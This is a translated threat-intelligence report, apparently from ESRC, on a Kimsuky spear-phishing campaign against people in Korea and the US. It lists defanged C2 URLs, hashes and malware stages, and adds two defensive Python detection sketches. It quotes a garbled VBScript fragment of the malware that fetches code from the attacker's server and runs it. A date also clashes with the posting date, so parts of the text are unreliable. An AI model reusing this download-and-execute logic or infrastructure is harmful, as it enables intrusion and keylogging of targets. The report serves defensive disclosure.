#1255063: Kimsuky unveils APT campaign 'Smoke Screen' aimed at Korea and America
ESRC discovered that a spear-phishing attack was carried out in Korea on April 11th against people working in North Korea-related fields.
It turned out to be an extension of the 'Operation Stealth Power' APT attack, which was spread on April 03 ([recent trends of major countries related to the Korean peninsula] and [3.17 Secret Security Summit of United States]), and the organization behind it is the same one behind the Korea Hydro & Nuclear Power (KHNP) hacking attack.
Analysis of the APT Campaign 'Smoke Screen' targeting Korea and the US
[Picture 1] Attack image of government official's remarks about Han Mi-jeong meeting
The attacker misleads the recipient with the heading 'Remarks by government officials related to the Han Mi-jeong meeting' and has attached a malicious file named "
hwp. The malicious document files were circulated encrypted, and the EPS vulnerability will not work unless a password is entered.
When the document file vulnerability is triggered, it attempts to communicate with a specific command-and-control (C2) server in Korea and loads the file 'first.hta'. The VBScript code contained in the HTML application is then executed.
The malicious script code goes through Stages 1-3 of the following steps, runs a PowerShell-based keylogger, and secretly collects information from the infected computer. It also registers itself in the registry and performs its spy functions through C2 communication only.
- http://naban.co[.]kr/mobile/skin/member/ctml/v/first.hta
- http://naban.co[.]kr/mobile/skin/member/ctml/v/expres.php?op=1
- http://naban.co[.]kr/mobile/skin/member/ctml/v/upload.php
- http://naban.co[.]kr/mobile/skin/member/ctml/v/Second.hta
- http://naban.co[.]kr/mobile/skin/member/ctml/v/expres.php?op=2
- http://naban.co[.]kr/mobile/skin/member/ctml/v/upload.php
- http://naban.co[.]kr/mobile/skin/member/ctml/v/keylogger1.ps1 -> ktmp.log
For reference, the servers used in the attack share a common feature: they are all connected to the IP address of one specific server in Korea.
- naban.co[.]kr (110.4.107[.]244)
- jmable.mireene[.]com (110.4.107[.]244)
- itoassn.mireene[.]com (110.4.107[.]244)
- jmdesign.mireene[.]com (110.4.107[.]244)
When the malicious HWP document is opened, it shows the title and contents of 'Government Official Remarks (20190409) related to the Korea-US summit meeting'. The document is registered with the same 'Tom' account as in the earlier 'Stealth Power' operation.
[Fig. 1-1] Screen shown after execution of the malicious HWP, and the 'Tom' account
Meanwhile, a malicious document file named 'TaskForceReport.doc', created at 05:15 pm (KST) on April 01, 2019, was observed overseas.
ESRC has tied this malicious DOC document file to recent specific intrusion incidents in South Korea and the United States, and believes the threat organization is actively carrying out targeted attacks at home and abroad.
Interestingly, the series of malicious code used in this APT attack is connected, directly or indirectly, with the Kimsuky organization's 'Operation Stealth Power' silent operation (2019-04-30) and with 'Operation Giant Baby' (2019-03-28) of the Baby campaign series.
From the end of March to the beginning of April, all malicious HWP document files found in Korea used the same vulnerability attack method, and the account name that created the document files also matches 'Tom'.
[Fig. 1-2] HWP malicious document file metadata screen
■ Camouflage tactics and smoke-screen ghosts: background of "Campaign Smoke Screen"
The malicious 'TaskForceReport.doc' files were first reported abroad, but the document itself was written in Korean, and there are many similar variants.
The malicious file creators used unique Windows accounts such as 'windowsmb', 'JamFedura', 'Aji', 'DefaultAcount', 'yer' and 'Roberts Brad', and they are also involved in the development of related programs.
Some accounts are registered with Kakao Talk in Korea and use messenger services such as Telegram and Skype.
Based on a comprehensive assessment, ESRC believes that 'state-sponsored actors' are behind this APT attack. They use Korean and English freely and disguise themselves with fake foreign profile photographs. We named it "Campaign Smoke Screen" because we observed that it operates stealthily.
The threat organization, classified in connection with the 2014 hacking, takes part in APT attacks in Korea and the US. It was revealed that in Korea the HWP document file vulnerability is exploited, while overseas a DOC document file vulnerability is used.
■ DOC-based APT attack strategy tactics and threat vector analysis
The malicious document file 'TaskForceReport.doc' (MD5: d400adcd06e0a07549e2465c9c500c45), which was produced on April 01, 2019, was distributed through the following address.
- tdalpacafarm[.]com/wp-includes/Text/Diff/common/doc.php
This server has already been reported, in the Palo Alto Networks Unit 42 team's 'New BabyShark Malware Targets US National Security Think Tanks', as the C2 of the malicious document 'Oct_Bld_full_view.docm' (MD5: 1a6f9190e7c53cd4e9ca4532547131af).
The following VBA code was used at the time.
Sub change_words (ByVal findWord, ByVal replaceWord)
If 'Vkggy0.hta' in the code above is loaded normally, an internal VBScript command receives an HTTP GET response and additional PowerShell commands are executed in sequence.
The malicious document files found this time follow the same sequence.
First, when the malicious document file is opened, a security warning message is displayed to prevent the active content from being executed.
[Figure 2] Screen displayed after execution of the malicious document written in Korean
The malicious document contains the files 'activeX1.bin' to 'activeX10.bin'. Among them, the 'activeX2.bin' file contains the communication host address as follows, and additional C2 communication is attempted depending on the HTA commands and conditions.
- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/Htqgf0.hta
- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/expres.php?op=1
- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/cow.php?op=exe.gif
- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/cow.php?op=cow.gif
[Figure 3] Inside code screen of 'activeX2.bin' file
Among other variants distributed under the same file name, 'TaskForceReport.doc' (MD5: 0f77143ce98d0b9f69c802789e3b1713) was circulated in March.
- https://christinadudley[.]com/public_html/includes/common/Qfnaq0.hta
- https://christinadudley[.]com/public_html/includes/common/expres.php?op=1
- https://christinadudley[.]com/public_html/includes/common/cow.php?op=Normal.src
- https://christinadudley[.]com/public_html/includes/common/Normal.src
- https://christinadudley[.]com/public_html/includes/common/cow.php?op=exe.gif
- https://christinadudley[.]com/public_html/includes/common/cow.php?op=cow.gif
The C2 domain used was the christinadudley[.]com site.
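The URL lists above share one request order on every C2: an .hta file, then expres.php?op=N from the same directory, then cow.php, upload.php or a .ps1. The following is an added detection sketch, not code from the original report, that looks for that order in web proxy logs; the log format, the 300-second window and the c2.example / intranet.example hosts are assumptions.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

WINDOW = 300  # seconds; assumed correlation window, tune per environment
# Constructed proxy log lines (epoch, client, method, URL); hosts are placeholders.
SAMPLE_LOG = """\
1554100500 10.0.0.5 GET https://c2.example/inc/common/Abcde0.hta
1554100502 10.0.0.5 GET https://c2.example/inc/common/expres.php?op=1
1554100510 10.0.0.5 GET https://c2.example/inc/common/cow.php?op=exe.gif
1554100520 10.0.0.7 GET https://intranet.example/help/viewer.hta
1554100900 10.0.0.8 GET http://c2.example/v/first.hta
1554100903 10.0.0.8 GET http://c2.example/v/expres.php?op=1
1554100950 10.0.0.8 POST http://c2.example/v/upload.php
1554100960 10.0.0.8 GET http://c2.example/v/keylogger1.ps1
"""

def stage_of(path, query):
    """Map a request to one of the stage names seen in the report's URL lists."""
    name = path.rsplit("/", 1)[-1].lower()
    if name.endswith(".hta"):
        return "hta"
    if name in ("expres.php", "cow.php") and "op" in parse_qs(query):
        return name[:-4]            # "expres" or "cow"
    if name == "upload.php":
        return "upload"
    return "ps1" if name.endswith(".ps1") else None

def find_chains(log_text, window=WINDOW):
    """Alert when a client fetches an .hta, then expres.php?op= from the same directory."""
    seen = defaultdict(list)        # (client, host, directory) -> [(ts, stage)]
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                # skip malformed lines
        ts, client, _method, url = parts
        u = urlsplit(url)
        stage = stage_of(u.path, u.query)
        if stage:
            seen[(client, u.hostname, u.path.rsplit("/", 1)[0])].append((int(ts), stage))
    alerts = []
    for (client, host, directory), events in seen.items():
        events.sort()
        starts = [t for t, s in events if s == "hta"]
        if not starts:
            continue
        later = [s for t, s in events if s != "hta" and starts[0] <= t <= starts[0] + window]
        if "expres" in later:
            alerts.append((client, host, directory, ["hta"] + later))
    return alerts
```

A lone .hta download (the intranet.example line) does not alert; only the .hta followed by expres.php?op= from the same client, host and directory does.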
The file 'Qfnaq0.hta' contains the following script code, which loads the 'expres.php?op=1' code via the decoding key and routine.
(d): For i = 0 To d-1: For ix = 0 To Int ((c) (L / d) * d): Co 00 = s: Right: c = L / d) -1: s = s & Mid (c, ix * d + jx + 1,1) End Function: Set PostO = CreateObject ("MSXML2.ServerXMLHTTP.6.0"): Post0.open "GET", "https: // christinadudley [.] Com / public_html / includes / common / expres.php? F0: Execute (t0): window.close () </ script> </ html>
The file 'exe.gif' that is finally distributed is BASE64-encoded, and when it is decoded, it becomes 32-bit EXE format malicious code.
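A triage check for the mismatch described above, where a download named like an image is really Base64 text that decodes to a 32-bit Windows executable. This is an added example, not code from the original report; it assumes the body is plain Base64 of the whole file, and the sample header is constructed.

```python
import base64
import binascii
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C   # COFF machine value for 32-bit x86

def classify_download(data):
    """Classify the body of a download whose name claims to be a GIF."""
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"                                   # real GIF magic
    try:
        raw = base64.b64decode(b"".join(data.split()), validate=True)
    except (binascii.Error, ValueError):
        return "unknown"                               # not Base64 at all
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return "base64-other"
    (e_lfanew,) = struct.unpack_from("<I", raw, 0x3C)  # offset of the PE header
    if e_lfanew + 6 > len(raw) or raw[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return "base64-mz-no-pe"
    (machine,) = struct.unpack_from("<H", raw, e_lfanew + 4)
    return "base64-pe32-x86" if machine == IMAGE_FILE_MACHINE_I386 else "base64-pe-other"

def constructed_pe_header_b64(machine):
    """Constructed sample: a bare MZ/PE header (no code), Base64-encoded."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", hdr, 0x44, machine)
    return base64.b64encode(bytes(hdr))

if __name__ == "__main__":
    print(classify_download(constructed_pe_header_b64(0x014C)))
    print(classify_download(b"GIF89a\x01\x00\x01\x00"))
```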
Looking at the HTA script used in the DOC attack vector, you can see that its format is similar to the scripts in the HWP-based 'Operation Stealth Power' threat that occurred in Korea on March 31 and April 1 and in this 'Smoke Screen' case.
The PowerShell-based keylogging function (function Start-KeyLogger) installed by the HWP malicious document was also used in the same way in the DOC malicious document series.
The threat organization uses the HWP document vulnerability in APT attacks in Korea and malicious DOC documents in foreign countries.
|Date added||April 17, 2019, 5:57 p.m.|